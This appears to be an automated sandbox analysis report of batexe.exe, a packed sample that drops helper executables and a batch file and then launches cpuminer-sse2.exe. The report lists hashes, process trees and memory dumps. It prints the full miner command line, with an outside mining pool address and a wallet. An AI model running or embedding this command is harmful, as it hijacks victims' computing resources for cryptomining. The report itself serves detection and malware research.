73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
295s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 05:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
372	b2e.exe
3080	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3080	cpuminer-sse2.exe
3080	cpuminer-sse2.exe
3080	cpuminer-sse2.exe
3080	cpuminer-sse2.exe
3080	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1700-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1700 wrote to memory of 372	1700	batexe.exe	75
PID 1700 wrote to memory of 372	1700	batexe.exe	75
PID 1700 wrote to memory of 372	1700	batexe.exe	75
PID 372 wrote to memory of 4660	372	b2e.exe	76
PID 372 wrote to memory of 4660	372	b2e.exe	76
PID 372 wrote to memory of 4660	372	b2e.exe	76
PID 4660 wrote to memory of 3080	4660	cmd.exe	79
PID 4660 wrote to memory of 3080	4660	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1700
- C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe

Filesize
1.5MB

MD5
9b176f593279ba0c1323f8f7f97451ad

SHA1
ba6000e755e4435056f75a6890ea74227ff3b3be

SHA256
ef64a45ae4bf6ffe0561a2c5dd8649e5d9c2b820c79b37993b73343de9011cd9

SHA512
c142020534d918442f639bfc705f0803888898d630c485aaeaebb0569cabc97b9a41688d2657d5a0639ef3a536b4f34a997c04fffc095cbf678004076192e680

Download Submit
C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe

Filesize
1.1MB

MD5
97273ca8e0752a769b2ebadfab641654

SHA1
227715c4b14afcbb127126bcd969be9419e7e2a9

SHA256
3280b5ac8f98bab8a0d88704002aecf12d93a42bdd0fd867dda8389aabd092a0

SHA512
43b72190640777b6bbed8fcdfabd3992982646b7855cdefbb192d9519bc58fb3211f6213b8b0f79287f88e05569ce89a8b093537eba2cdc54567a9a587672bfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\9AD8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.5MB

MD5
1bb3ad6d539fd0dc2dd29018de7333b1

SHA1
338391e3c11724d819d58459fd1745c1009386b3

SHA256
8c1d49540b2b38d2ae42be53f4c3c09e9669d60000add358b79f7995bdbcf724

SHA512
7658cb7b6d543b9a3901042218adc9c45fc1597d8134b1a06ef81564c13c8f708b8a960ac63808131bde89b1b314e254680fd350bde1267bd3faa3ae966fda3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
714KB

MD5
22f60d7e4152d88cace16e4d0c6d37db

SHA1
9586d8067a989f60efb9ac301d3f554f6e137e73

SHA256
cf5628924405f65d6776adbe3afa3295115ff9024b317917991db703cacd95e9

SHA512
af1b2d3581023e965ceb9b54b7db5b5c3bd3749334732fa8363d915809494282997e35b6a277cd816bd054f57813e013352d14d22f3d525712dc6ec69e247f20

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
839KB

MD5
e050a2dfb31239cfa67d1ebdce797304

SHA1
87a1ea8d8c6bdb233915f7e94aec08e984ed71a3

SHA256
bb97e4fabd790e27de73d7d1474ef8b48cd213b2d2985a19adbdb30965ed64ee

SHA512
440d5202066172c2f18c00beb31050f6eaec856753d54b21031f20dc93db8b6a8ece9e992e2de1f261ffc0911c8a0d8021e4a13e83a786a4b5b3c041307b9bf3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
57KB

MD5
4a91d8f522a86a4a67e44a7667410a6f

SHA1
7ecf2598d4da2b1b105991b2f5a49c8e14e648a4

SHA256
4ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c

SHA512
aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
54KB

MD5
e559b417800c9fa9d8fc0f8e74cec4d5

SHA1
645f39b713e371069f663865b4f1c1799c8ed7e8

SHA256
0f331b1862063f083ac9466f36f4c5f47c581c8565ad8e7f819d88bb6ad19ec8

SHA512
ed591c87a5ee65723f77e2592c347eef22cc5149b093b11aaae827a4b870035bbe93e04d4ffb6240f58f8b0b9a6d7cfa41abac4eb10c4af8877b10c79943feb8

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.4MB

MD5
5decdfa2edae3faf997146b2b139f8e2

SHA1
1c17aae2332aafb420455ff3243eb74cca0d1bc3

SHA256
87e74a9f3ed8ae2c709a7a536d8273cea3ea76728c6c91d65a16bcb0acf201e3

SHA512
73368bdb2ee5edf0f6574fe5174fff525b7a52a09a2635cb37c80f4fe42d835e559e15e4e9fdac880663033dcd45d6a7cbfddf9468ec3eb0d1e1bcd033726444

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
112KB

MD5
e7e9295a7e6fe4b517975f9669d72ddb

SHA1
c28205292139a125643b0fe52fbef24e06f3b03c

SHA256
8cb603e12a335688594ac75b007312742095664b39ca453caad50f80d9ad2812

SHA512
b4e28b3e1ff3388a2b704a0dc5c438def285d0387b8146a109f074722e2a53deaa4cf93e88ab4d80d4df6c190986142130faf5d323fd00aa19a1ea02cc6472de

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
48KB

MD5
c159e732781dcaae38bca8032c0159af

SHA1
b1b90c032027e12a040b5c5cfa3dff49b82a310f

SHA256
f14ed53d135cdabd35cf48cea9bf87903f4d7fb4c192a182b878881d4ce295b9

SHA512
5758fd0b94cf9d99051c2349ec0aa03e53313a1e81bb1975b653b04c47286804f6667dbb406540f20f2679c8a0b340d6a1aa7503bebd712125adde4c5e2bc5b3

Download Submit
memory/372-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/372-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1700-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3080-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3080-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/3080-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3080-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-43-0x000000006F6F0000-0x000000006F788000-memory.dmp

Filesize
608KB

Download
memory/3080-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3080-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download